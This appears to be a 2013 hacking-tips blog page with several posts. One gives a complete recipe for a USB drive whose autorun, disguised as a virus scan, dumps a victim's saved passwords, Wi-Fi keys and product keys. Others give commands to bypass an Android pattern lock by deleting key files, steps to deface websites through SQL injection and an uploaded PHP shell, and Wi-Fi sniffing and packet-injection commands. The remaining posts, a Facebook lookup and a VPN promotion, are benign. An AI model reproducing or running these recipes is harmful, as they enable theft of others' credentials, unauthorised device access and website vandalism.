Monday, 9 December 2013

Use UsB To STEAL SOMEONES PASSWORD

I will show you an easy way to steal passwords of a computer with a USB

step 1: open notepad/wordpad
type:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save this as AUTORUN.inf

step2: open a new notepad/wordpad document
type:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt
save this as LAUNCH.bat


step3: copy the autorun and launch file to your USB

Step 4: Go to http://www.nirsoft.net/
And download the programs which named in Step 2…
[Ex:- mspass.exe mailpv.exe ]

step5: extract the files you downloaded to your desktop and copy all the .exe
files to your USB

step6: remove and re-insert your USB

step7: click on the option ” perform a virus scan”
(this is an exemple, if you want it to say something else go to the autorun file and change it

step8: go to “my computer”—> USB DRIVE and open it

Now see some text files, if you open them you will see usernames and passwords

NOTICE: this only recovers passwords that have once been saved on your computer (if it didn’t crash during the years)
msn passwords will not be shown because almost nobody saves those

Sunday, 8 December 2013

Bypass Android Pattern unlock.

[3 STEPS!]
Requirements :
Linux distro
Android phone
USB cable
ADB
Step 1.
1.Connect your phone to your PC
using USB cable.
Step 2. - Installing ADB over terminal
1.Boot into any Linux distro you
have.
2.Open up terminal and type :
Quote:sudo apt-get install android-
tools-adb
This will install ADB.
Step 3. - Disabling pattern unlock
over terminal
1.Open up terminal again and type :
Quote:adb devices
adb shell
cd data/system
su
rm *.key
Now,disconnect your phone and
reboot.Unlock pattern should be
here.Just try some random gesture
and it will unlock.

How to Use andriod Internet on PC.

Requirement : 1) Android Phone.  2)Usb Cable.



1:Enabled the usb debugging setting.

2:Download file's reverse thetering from https://www.dropbox.com/sm/create/ReverseTethering_2.30_%20ceh.Fida.zip
3:Extract folder.Choose androidtool.exe like the image below.
4:connect USB
5:Select your phone device and connect box will appear.
6: Allow the grant message on your phone.



Saturday, 7 December 2013

Easy Way to Deface A Websites

Things needed while doing this:
• A VPN.
• A Shell Script.
• A Picture Uploading Spot or any Uploading spot.

Step 1.
First off, find a website vuln to SQLi and gain admin access
(If you need help with step 1 just PM me on 
https://www.facebook.com/CEH.Fida and I'll help you.)
Step 2.
Find a spot where you can upload file. pictures, files, ect

Step 3.
Open up Notepad++ and make a .php file and insert THIS code in it.

Step 4.
Upload the PHP file to the website.

Step 5.
Locate your PHP file.
If you can't locate your PHP file, try to find a picture then Right Click the picture and look for "Copy Image Location" open a new tab paste it in the URL take out the pictures name and put the shell name.

Step 6.
Find Index.php or Index.html and edit it with your Deface source code.

I know this with a unneeded tutorial but I see so many posts on how to deface.

Packet sniffing (Wireshark) and injecting (Wireless)

Uses :

-Disrupting certain services (file sharing or HTTP) by internet service providers and wireless access points
-Compromising wireless access points and circumventing their security
-Exploiting certain functionality in online games
-Determining the presence of internet censorship
-Allows for custom packet designers to test their custom packets by directly placing them onto a computer network
-Simulation of specific network traffic and scenarios
-Testing of network firewalls and intrusion detection systems
-Computer network auditing and troubleshooting computer network related issues
-Man in the middle attack

Requirements :

Backtrack
Wireshark
MAC address of your wireless access point
Your wireless access point channel

SEQUENCE 1. - Sniffing

Part 1. - Sniffing packets via Wireshark

1.Open up Wireshark.
2.Click on Interface List.Captureable packets will begin to list.
3.To sniff listed packets,just click Start button.

Part 2. - Sniffing packets (WEP encrypted) via Backtrack

1.Open up terminal.
2.Type in:

Quote:airodump-ng --bssid your_wireless_MAC_address mon0

3.Wait till airodump-ng is finished.
4.After it has finished,you should see the number of your channel under CH label.
5.Now we need to target our access point so it show only packets from our access point,using this command:

Quote:iwconfig mon0 channel channel_here

Now let's see packets coming from our access point over Wireshark!

6.Go to Wireshark window.
7.Type this in filter box:

(wlan.bssid == your_MAC_address_here) && (wlan.fc.type_subtype == 0×20)

8.You can see packets coming from our access point only!

SEQUENCE 2. - Injecting

Part 1. - Injecting via Wireshark and Backtrack

1.Go to Wireshark window.
2.Type this in filter box:

Quote:bssid == your_MAC_address_here) && !(wlan.fc.type_subtype == 0×08)

3.Finally,go to Backtrack window and type.

Quote:aireplay-ng -9 -e "your_SSID_here" -a your_MAC_address_here mon0

Thursday, 5 December 2013

Get Facebook Username,Gender and other detail with username or ID.

When you enter user name / id you get this info....
Example:
{
   "id": "100004873266258",
"name": "Ceh Cscu",
"first_name": "Ceh",
"last_name": "Cscu",
"link": "http://www.facebook.com/CEH.Fida",
"username": "CEH.Fida",
"gender": "male",
"locale": "en_US"
}

Enter Username / ID in this box and press on ("Get Facebook Details") button.

Monday, 2 December 2013

Unblock youtube very fast buffering

About ZenMate wrote:ZenMate is the first product of ZenGuard UG (haftungsbeschränkt). ZenGuard was founded in Manchester (UK) and is now a Berlin (Germany) based start-up. We are devoted to putting you first on the Internet and work hard to create tools that protect your privacy and security while retaining full access to information regardless of your location.

Read more on Chrome Web Store: ZenMate

Releases:
- 14 July 2013, v2.2
- 16 July 2013, v2.4
- 29 July 2013, v2.9
- 18 October 2013, v3.1 - Compatible with Maxthon Cloud Browser, Chromium, SRWare Iron
ZenMate for Google Chrome wrote:Secure browsing made simple: Encrypts your browser traffic. WiFi & Hacker security. Unblock GEO restrictions. Protect your privacy.

ZenMate is the premier security and privacy extension for Google Chrome™. The award winning plugin impresses with unmatched simplicity, superior User Interface and an unrivalled User Experience. ZenMate excites through the following features: 

✔ 100% Encryption of browser traffic
✔ Built-in Acceleration
✔ Hassle free setup & very easy to use
✔ 1-click install
✔ Lightweight integration
✔ Instant protection, privacy and security
✔ Substitution & masking of IP 
✔ Worldwide high-speed servers

Try out ZenMate and see for yourself what everybody is talking about!

It's free and always will be..
zenmate is used in google chrome,maxton browser.zenmate is a addon.

zenmate Addon